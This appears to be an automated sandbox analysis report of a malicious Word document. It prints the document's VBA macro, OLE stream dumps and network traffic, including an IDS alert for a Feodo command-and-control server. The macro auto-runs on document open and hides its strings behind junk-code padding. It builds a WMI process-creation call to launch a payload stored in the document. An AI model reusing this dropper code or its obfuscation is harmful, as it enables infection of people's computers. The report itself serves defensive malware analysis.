#zaZqi,
"O:\ikJcU\cGIxAAG\fEBwJJ.UFkBBLGk"
#GvYvntR
WvseC
XRvZBDBD:
#IyJitF
mKbjhqs
"F:\qyUZgDN\BGtxCFHH\NTfeA.DExaE"
#VGYhDjxf
"O:\cRwnDC\zYXqog\gNodA.UMeMIyH"
"F:\nByRqYG\TFriHa\TImuB.vzTdgVSJ"
#gGHPnUA,
GigmCE
sIjWJBH()

VBA Code

Attribute VB_Name = "Xhlj9irufb65_wekzf"
Function Jotxu6biv0471oy0()
On Error Resume Next
mKbjhqs = Xlb0g5eyj545.StoryRanges.Item(244 / 244)
   GoTo aMSHGI
Dim VWDNpuI() As Byte
Dim FmdzUop As Integer
FmdzUop = FreeFile
Open "F:\emayA\cEXRoDjH\VwIACIE.cAhxFlQk" For Binary Access Read As #FmdzUop
Open "O:\vzKFL\xTplfDEO\UzdPBJhtk.FxjwCGqT" For Binary Access Read As #FmdzUop
ReDim VWDNpuI(1 To LOF(intGend) - 5)
Get #FmdzUop, , VWDNpuI
Get #FmdzUop, , VWDNpuI
Get #FmdzUop, , VWDNpuI
Close #FmdzUop
aMSHGI:
snahbsd = "]b2[sp]b2[s"
Mvmowvl61pq1 = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
   GoTo BaaeH
Dim GEdfI() As Byte
Dim HHIaF As Integer
HHIaF = FreeFile
Open "F:\JJhGoHJAy\mhYgHAECB\ScIqGCAp.sgqtGoGFB" For Binary Access Read As #HHIaF
Open "O:\skwqjIHSw\BGDBEtNI\SVgGCDCe.oeVOIAwo" For Binary Access Read As #HHIaF
ReDim GEdfI(1 To LOF(intGend) - 5)
Get #HHIaF, , GEdfI
Get #HHIaF, , GEdfI
Get #HHIaF, , GEdfI
Close #HHIaF
BaaeH:
W_z0xk65anh723p = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
   GoTo QrZrL
Dim sIjWJBH() As Byte
Dim jKkUJJZ As Integer
jKkUJJZ = FreeFile
Open "F:\MIXPEQq\xrgAtKF\wbeXEF.fMufiCa" For Binary Access Read As #jKkUJJZ
Open "O:\gtNTBHAA\pRTARkP\omJGJZDcR.TSCsY" For Binary Access Read As #jKkUJJZ
ReDim sIjWJBH(1 To LOF(intGend) - 5)
Get #jKkUJJZ, , sIjWJBH
Get #jKkUJJZ, , sIjWJBH
Get #jKkUJJZ, , sIjWJBH
Close #jKkUJJZ
QrZrL:
Bcu4d7izwi5q = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
   GoTo zDLxpKAFE
Dim PFNPd() As Byte
Dim nBVGMJ As Integer
nBVGMJ = FreeFile
Open "F:\KzjhHR\fTZqG\WLFeZHJ.RQtHHgTHi" For Binary Access Read As #nBVGMJ
Open "O:\xfHgsuZ\OuWcHBRFs\aVDcAfBmF.wxMQaJA" For Binary Access Read As #nBVGMJ
ReDim PFNPd(1 To LOF(intGend) - 5)
Get #nBVGMJ, , PFNPd
Get #nBVGMJ, , PFNPd
Get #nBVGMJ, , PFNPd
Close #nBVGMJ
zDLxpKAFE:
Md7uay_rjhi = "]b2[ss]b2[s"
   GoTo OuPbAWEJB
Dim KnLfUEp() As Byte
Dim abJXtUnJ As Integer
abJXtUnJ = FreeFile
Open "F:\qyUZgDN\BGtxCFHH\NTfeA.DExaE" For Binary Access Read As #abJXtUnJ
Open "O:\aIUpFwC\nTpvYbID\cOpRCH.yenkEdEBG" For Binary Access Read As #abJXtUnJ
ReDim KnLfUEp(1 To LOF(intGend) - 5)
Get #abJXtUnJ, , KnLfUEp
Get #abJXtUnJ, , KnLfUEp
Get #abJXtUnJ, , KnLfUEp
Close #abJXtUnJ
OuPbAWEJB:
C_tmpi32le9 = Bcu4d7izwi5q + Md7uay_rjhi + W_z0xk65anh723p + snahbsd + Mvmowvl61pq1
   GoTo uwrli
Dim KcYzD() As Byte
Dim DLbwIFKRv As Integer
DLbwIFKRv = FreeFile
Open "F:\BokkBJR\JVqtTl\wBdFDGCm.csxtJBIHA" For Binary Access Read As #DLbwIFKRv
Open "O:\zDxufIC\iCExC\ZRtuVA.YMVmJ" For Binary Access Read As #DLbwIFKRv
ReDim KcYzD(1 To LOF(intGend) - 5)
Get #DLbwIFKRv, , KcYzD
Get #DLbwIFKRv, , KcYzD
Get #DLbwIFKRv, , KcYzD
Close #DLbwIFKRv
uwrli:
H4qcty67722xqmrmn = Lehj73snaqzhyepdw9(C_tmpi32le9)
   GoTo JpnbIUF
Dim jLIIJFE() As Byte
Dim GigmCE As Integer
GigmCE = FreeFile
Open "F:\tzCMq\XMchB\YUPCDfDKL.EffNJq" For Binary Access Read As #GigmCE
Open "O:\ZGlzCsC\TtOjBxE\gAFGG.ByczYWAGo" For Binary Access Read As #GigmCE
ReDim jLIIJFE(1 To LOF(intGend) - 5)
Get #GigmCE, , jLIIJFE
Get #GigmCE, , jLIIJFE
Get #GigmCE, , jLIIJFE
Close #GigmCE
JpnbIUF:
Set Fcqv6woostm0 = CreateObject(H4qcty67722xqmrmn)
   GoTo OstReD
Dim HXWoFCJP() As Byte
Dim gGHPnUA As Integer
gGHPnUA = FreeFile
Open "F:\yhIgJCIMF\qsJDB\PptZC.VCOUrPxF" For Binary Access Read As #gGHPnUA
Open "O:\cRwnDC\zYXqog\gNodA.UMeMIyH" For Binary Access Read As #gGHPnUA
ReDim HXWoFCJP(1 To LOF(intGend) - 5)
Get #gGHPnUA, , HXWoFCJP
Get #gGHPnUA, , HXWoFCJP
Get #gGHPnUA, , HXWoFCJP
Close #gGHPnUA
OstReD:
Ma9hdg7q365lpb = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs))
   GoTo XRvZBDBD
Dim nTckscaDq() As Byte
Dim pYTRxECC As Integer
pYTRxECC = FreeFile
Open "F:\SVdfFCU\nnqUrp\YWmSNHII.kFjgBgDk" For Binary Access Read As #pYTRxECC
Open "O:\NCeDGUAx\liGyAIZj\lUyiD.VfSxEM" For Binary Access Read As #pYTRxECC
ReDim nTckscaDq(1 To LOF(intGend) - 5)
Get #pYTRxECC, , nTckscaDq
Get #pYTRxECC, , nTckscaDq
Get #pYTRxECC, , nTckscaDq
Close #pYTRxECC
XRvZBDBD:
   GoTo oMoXwHAi
Dim HNtcACoR() As Byte
Dim zaZqi As Integer
zaZqi = FreeFile
Open "F:\nByRqYG\TFriHa\TImuB.vzTdgVSJ" For Binary Access Read As #zaZqi
Open "O:\OoAuHBF\TrVff\lRegJKh.zDCEsFDJE" For Binary Access Read As #zaZqi
ReDim HNtcACoR(1 To LOF(intGend) - 5)
Get #zaZqi, , HNtcACoR
Get #zaZqi, , HNtcACoR
Get #zaZqi, , HNtcACoR
Close #zaZqi
oMoXwHAi:
Fcqv6woostm0.Create Lehj73snaqzhyepdw9(Ma9hdg7q365lpb), Ndofzqkqt8o8ky4, Es2mklc5pr30boja
   GoTo vSgqJI
Dim uqjqkyHX() As Byte
Dim ovskCI As Integer
ovskCI = FreeFile
Open "F:\UkqzBHD\AfilMCw\FaEXXAH.VJBQHBwD" For Binary Access Read As #ovskCI
Open "O:\uYQKM\KtKdHCsGD\lkgPV.CtEPFIa" For Binary Access Read As #ovskCI
ReDim uqjqkyHX(1 To LOF(intGend) - 5)
Get #ovskCI, , uqjqkyHX
Get #ovskCI, , uqjqkyHX
Get #ovskCI, , uqjqkyHX
Close #ovskCI
vSgqJI:
   GoTo iNgaE
Dim DCGxZIHE() As Byte
Dim FELuBTD As Integer
FELuBTD = FreeFile
Open "F:\AlLTF\KjklIF\ZbOCaDfmF.zRWqJ" For Binary Access Read As #FELuBTD
Open "O:\CSYaI\BeKGII\ISlAUHBA.hUrieDEBA" For Binary Access Read As #FELuBTD
ReDim DCGxZIHE(1 To LOF(intGend) - 5)
Get #FELuBTD, , DCGxZIHE
Get #FELuBTD, , DCGxZIHE
Get #FELuBTD, , DCGxZIHE
Close #FELuBTD
iNgaE:
End Function
Function Lehj73snaqzhyepdw9(Wft58t8kair)
On Error Resume Next
   GoTo WvseC
Dim pKryCIHFC() As Byte
Dim GvYvntR As Integer
GvYvntR = FreeFile
Open "F:\CmcVFs\XishGzBCo\hcyLYIRH.wmCZaBADB" For Binary Access Read As #GvYvntR
Open "O:\QYYEIdD\lneIGGHdk\tPJGEIe.xXBLI" For Binary Access Read As #GvYvntR
ReDim pKryCIHFC(1 To LOF(intGend) - 5)
Get #GvYvntR, , pKryCIHFC
Get #GvYvntR, , pKryCIHFC
Get #GvYvntR, , pKryCIHFC
Close #GvYvntR
WvseC:
Gybrsxbkupnb96n = (Wft58t8kair)
   GoTo DtPcJVH
Dim LveTGO() As Byte
Dim CMVnWpNGG As Integer
CMVnWpNGG = FreeFile
Open "F:\LvKnA\BOtUEZATF\XZQseKaFA.wNmzM" For Binary Access Read As #CMVnWpNGG
Open "O:\rueRG\VzWpbFH\IjzjDqRCA.NfKzekAB" For Binary Access Read As #CMVnWpNGG
ReDim LveTGO(1 To LOF(intGend) - 5)
Get #CMVnWpNGG, , LveTGO
Get #CMVnWpNGG, , LveTGO
Get #CMVnWpNGG, , LveTGO
Close #CMVnWpNGG
DtPcJVH:
Htqq1guc2d740 = Jumkzxvtzz2s(Gybrsxbkupnb96n)
   GoTo VSmdWBCHE
Dim TOmTI() As Byte
Dim IyJitF As Integer
IyJitF = FreeFile
Open "F:\rRIMGI\pwZWJ\AvgVBxG.OaxnnLJb" For Binary Access Read As #IyJitF
Open "O:\vzest\bkKRAHG\viWaCHFyl.borAIDhH" For Binary Access Read As #IyJitF
ReDim TOmTI(1 To LOF(intGend) - 5)
Get #IyJitF, , TOmTI
Get #IyJitF, , TOmTI
Get #IyJitF, , TOmTI
Close #IyJitF
VSmdWBCHE:
Lehj73snaqzhyepdw9 = Htqq1guc2d740
   GoTo qQuwLC
Dim erxovx() As Byte
Dim FRpvMrG As Integer
FRpvMrG = FreeFile
Open "F:\bdvnDGG\YcExI\ktRsYELAd.fmxbB" For Binary Access Read As #FRpvMrG
Open "O:\hTNkC\vnsiEILT\lOvmX.DAaIToDF" For Binary Access Read As #FRpvMrG
ReDim erxovx(1 To LOF(intGend) - 5)
Get #FRpvMrG, , erxovx
Get #FRpvMrG, , erxovx
Get #FRpvMrG, , erxovx
Close #FRpvMrG
qQuwLC:
End Function
Function Jumkzxvtzz2s(Fuws4dl87mo)
Mjjc2_q8vgjc36 = G9cdtgijbhc3ewc
   GoTo OkxlX
Dim XUiHBHHUH() As Byte
Dim VGYhDjxf As Integer
VGYhDjxf = FreeFile
Open "F:\KqqRCCD\OxxrCn\eQUMRH.ZdxMJ" For Binary Access Read As #VGYhDjxf
Open "O:\ikJcU\cGIxAAG\fEBwJJ.UFkBBLGk" For Binary Access Read As #VGYhDjxf
ReDim XUiHBHHUH(1 To LOF(intGend) - 5)
Get #VGYhDjxf, , XUiHBHHUH
Get #VGYhDjxf, , XUiHBHHUH
Get #VGYhDjxf, , XUiHBHHUH
Close #VGYhDjxf
OkxlX:
Jumkzxvtzz2s = Replace(Fuws4dl87mo, "]b2[s", Dh8iwtx_gbrodi)
   GoTo XDAaIBnI
Dim YVAKAT() As Byte
Dim yhCeYdDx As Integer
yhCeYdDx = FreeFile
Open "F:\KrczWMd\cxBwEA\spjtC.VvknDGZ" For Binary Access Read As #yhCeYdDx
Open "O:\VoJkkBWBC\NcgoF\KcMVOEFe.igOXKnIU" For Binary Access Read As #yhCeYdDx
ReDim YVAKAT(1 To LOF(intGend) - 5)
Get #yhCeYdDx, , YVAKAT
Get #yhCeYdDx, , YVAKAT
Get #yhCeYdDx, , YVAKAT
Close #yhCeYdDx
XDAaIBnI:
End Function

VBA File Name: Xlb0g5eyj545, Stream Size: 1113

General
Stream Path:	Macros/VBA/Xlb0g5eyj545
VBA File Name:	Xlb0g5eyj545
Stream Size:	1113
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . S * q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 53 2a 71 86 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
Private
VB_Exposed
Attribute
VB_Creatable
VB_Name
Document_open()
VB_Customizable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Xlb0g5eyj545"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Jotxu6biv0471oy0
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 121

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	121
Entropy:	4.36374049783
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F ' . . . M i c r o s o f t O f f i c e W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 27 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.2493067649
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 524

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	524
Entropy:	4.07059716556
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 dc 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6477

General
Stream Path:	1Table
File Type:	data
Stream Size:	6477
Entropy:	6.03366692082
Base64 Encoded:	True
Data ASCII:	f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	66 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 00 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 99197

General
Stream Path:	Data
File Type:	data
Stream Size:	99197
Entropy:	7.38981630237
Base64 Encoded:	True
Data ASCII:	} . . . D . d . . . . . . . . . . . . . . . . . . . . . J F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . A . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . . . . . . . . . . . R . . . . . . . . . ) . . O . { . . . . c d E p ] . . . . . . . . . . . D . . . . . T . . F . . . . . . ) . . O . { . . . . c d E p ] . . . . . . .
Data Raw:	7d 83 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 46 ef 1f 08 02 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 83 00 0b f0 46 00 00 00 bf 00 04 00 04 00 04 41 01 00 00 00 05 c1 02 00 00 00 3f 01 00 00 06 00 bf 01 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 512

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	512
Entropy:	5.51490266847
Base64 Encoded:	True
Data ASCII:	I D = " { 9 C 4 8 3 F 4 6 - A 8 E 8 - 4 9 F A - B 2 E 1 - C 3 5 4 9 7 C 2 A 5 5 4 } " . . D o c u m e n t = X l b 0 g 5 e y j 5 4 5 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B t 0 8 u h x u 1 t n h y 1 . . M o d u l e = X h l j 9 i r u f b 6 5 _ w e k z f . . E x e N a m e 3 2 = " E u 2 5 y j 8 _ 2 h x w 2 w " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 1 4 3 A F 3 5 B 3 3 5 B 3 3 5 B 3 3 5 B 3 " . . D P B = " A
Data Raw:	49 44 3d 22 7b 39 43 34 38 33 46 34 36 2d 41 38 45 38 2d 34 39 46 41 2d 42 32 45 31 2d 43 33 35 34 39 37 43 32 41 35 35 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 58 6c 62 30 67 35 65 79 6a 35 34 35 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 74 30 38 75 68 78 75 31 74 6e 68 79 31 0d 0a 4d 6f 64 75 6c 65 3d 58 68 6c 6a 39 69 72 75 66 62 36 35 5f 77 65 6b 7a 66 0d

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 143

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	143
Entropy:	3.79627459375
Base64 Encoded:	False
Data ASCII:	X l b 0 g 5 e y j 5 4 5 . X . l . b . 0 . g . 5 . e . y . j . 5 . 4 . 5 . . . B t 0 8 u h x u 1 t n h y 1 . B . t . 0 . 8 . u . h . x . u . 1 . t . n . h . y . 1 . . . X h l j 9 i r u f b 6 5 _ w e k z f . X . h . l . j . 9 . i . r . u . f . b . 6 . 5 . _ . w . e . k . z . f . . . . .
Data Raw:	58 6c 62 30 67 35 65 79 6a 35 34 35 00 58 00 6c 00 62 00 30 00 67 00 35 00 65 00 79 00 6a 00 35 00 34 00 35 00 00 00 42 74 30 38 75 68 78 75 31 74 6e 68 79 31 00 42 00 74 00 30 00 38 00 75 00 68 00 78 00 75 00 31 00 74 00 6e 00 68 00 79 00 31 00 00 00 58 68 6c 6a 39 69 72 75 66 62 36 35 5f 77 65 6b 7a 66 00 58 00 68 00 6c 00 6a 00 39 00 69 00 72 00 75 00 66 00 62 00 36 00 35 00 5f

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3882

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3882
Entropy:	5.06335553284
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 671

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	671
Entropy:	6.45018531598
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . . . m . . . . ! O f f i c
Data Raw:	01 9b b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 ea 0e db 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d

Stream Path: WordDocument, File Type: data, Stream Size: 17966

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	17966
Entropy:	4.12951715638
Base64 Encoded:	False
Data ASCII:	. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . A . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5b 80 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 a4 41 00 00 0e 00 62 6a 62 6a ac fa ac fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 46 00 00 ce 90 01 00 ce 90 01 00 a4 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/13/21-16:32:08.898708	TCP	2404306	ET CNC Feodo Tracker Reported CnC Server TCP group 4	49168	80	192.168.2.22	152.170.79.100

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 16:31:48.822978020 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:48.978189945 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:48.978324890 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:48.980995893 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.135865927 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.179512978 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.179543972 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.179555893 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.179570913 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.179588079 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.179605007 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.179620981 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.179637909 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.179653883 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.179702997 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.179718018 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.179759026 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.334414959 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.334449053 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.334465981 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.334482908 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.334495068 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.334511995 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.334531069 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.334548950 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.334567070 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.334583044 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.334603071 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.334649086 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.334948063 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.334966898 CET	80	49167	35.208.69.64	192.168.2.22
Jan 13, 2021 16:31:49.335031033 CET	49167	80	192.168.2.22	35.208.69.64
Jan 13, 2021 16:31:49.335149050 CET	80	49167	35.208.69.64	192.168.2.22
